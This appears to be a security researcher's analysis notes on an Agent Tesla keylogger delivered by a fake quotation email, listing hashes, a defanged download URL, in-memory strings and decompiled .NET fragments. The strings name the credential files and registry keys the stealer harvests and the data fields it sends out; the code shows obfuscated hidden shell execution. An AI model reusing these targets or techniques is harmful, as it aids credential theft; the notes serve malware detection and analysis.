2018-06-26 #opendir .net #malware Agent Tesla

1. #opendir .net #malware
2. https://myonlinesecurity.co.uk/fake-quote-po-acpmreagan-com-delivers-a-keylogger/
3. @dvk01uk says Agent Tesla
4.  
5. 6/17 Quotation Order email
6.  
7. #open dir hxxp://ptpjm.co.id/id/
8.  
9. md5,82F0C02E321AC4FCE218EFDCABB4D75D
10. Company Quotation and sales contracts.zip
11.  
12. md5,8EB8B220A1648A081E32C6F3DADB55D1
13. Company Quotation and sales contracts.exe
14.  
15. interesting in-memory strings
16. 0x177a050 (114): \??\C:\Users\Win10\AppData\Roaming\Postbox\signons.sqlite
17. 0x177a1d0 (118): \??\C:\Users\Win10\AppData\Roaming\Thunderbird\profiles.ini
18. 0x1783d6c (96): HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesUser
19. 0x17cfcc0 (130): \??\C:\Users\Win10\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
20. 0x17d0530 (134): \??\C:\Users\Win10\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini
21. 0x3671d18 (26): http://checkip.dyndns.org/
22. 0x36c3814 (36): DynDNS-CheckIP/1.0
23. 0x376f784 (92): C:\Users\xxx\AppData\Local\Temp\\tmpG550.tmp
24. 0x376fc48 (20): URL:
25. 0x376fc70 (20): Username:
26. 0x376fc98 (20): Password:
27. 0x376fcc0 (26): Application:
28. 0x3774658 (142): type={0}
29. hwid={1}
30. time={2}
31. pcname={3}
32. logdata={4}
33. screen={5}
34. ipadd={6}
35. webcam_link={7}
36. screen_link={8}
37. site_username={9}
38. [passwords]
39. 0x3877ec0 (38): Opera Software\Opera Stable\Login Data
40. 0x387ba94 (156): C:\Users\xxx\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
41. 0x3893a20 (144): C:\Users\xxx\AppData\Roaming\Apple Computer\Preferences\keychain.plist
42. 0x38aabd4 (116): C:\Users\xxx\AppData\Roaming\Flock\Browser\\signons3.txt
43. 0x38bf860 (13): Torch Browser
44. 0x38c25ac (20): UCBrowser\
45. 0x38d41d0 (13): SMTP Password
46. 0x38d32e4 (258): HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Password
47. 0x3923b28 (72): HKEY_CURRENT_USER\Software\Paltalk\.
48. 0x39294f0 (45): \SmartFTP\Client 2.0\Favorites\Quick Connect\
49.  
50.  
51. interesting .net code from ilspy
52. ---------
53. object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WSfcfdfdsfdsfsffffffffffffffccript.Shell", ""));
54.  
55. string text = Interaction.Environ(#P.#K("5g+BxFHXkdTcEM3cEGgk0A==")) + #P.#K("sscpRZTSpuugDgOvmaPPPu6b/X9gZRYeKcyavwZ3WPM=");
56.  
57.  
58. string text = "%appdata%\\" + #P.#K("iXIzM98Pjl/u+zlU/h5Dfl19cMP29BJLIWFLWajNT92OKqOYE9q1PcctiVmnH8Ed") + #P.#K("#rundl343l32.exe#");
59.  
60. Interaction.Shell(text3 + #P.#K("#thenwfol#") + "\\" + #P.#K("#rundl343l32.exe#") + ".bat", AppWinStyle.Hide, false, -1);
61.  
62. File.Delete(text3 + #P.#K("#thenwfol#") + "\\qJ1rx6zo0JWv6cXezCyOGQ==.bat");
63.  
64. s = "美国八零会家美毒";
65.  
66. NewLateBinding.LateCall(instance, null, "Save", new object[0], null, null, null, true);
67.  
68. Process[] processesByName = Process.GetProcessesByName("qJ1rx6zo0JWv6cXezCyOGQ== ");
69.  
70.  
71. string[] array2 = "ezhjOTczMzBhLTZhMTItNDM1Zi1iMTQ5LWZhOGU1ZDc4YjQ0M30sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{22dae603-24dd-400a-a051-7564eef2723b},ezhjOTczMzBhLTZhMTItNDM1Zi1iMTQ5LWZhOGU1ZDc4YjQ0M30=,[z]{22dae603-24dd-400a-a051-7564eef2723b}".Split(array);
72.  
73.  
74. int num = (a == "w3wp.exe") ? 1 : 0;
75.  
76.  
77. string text2 = "@1B2c3D4e5F6g7H8";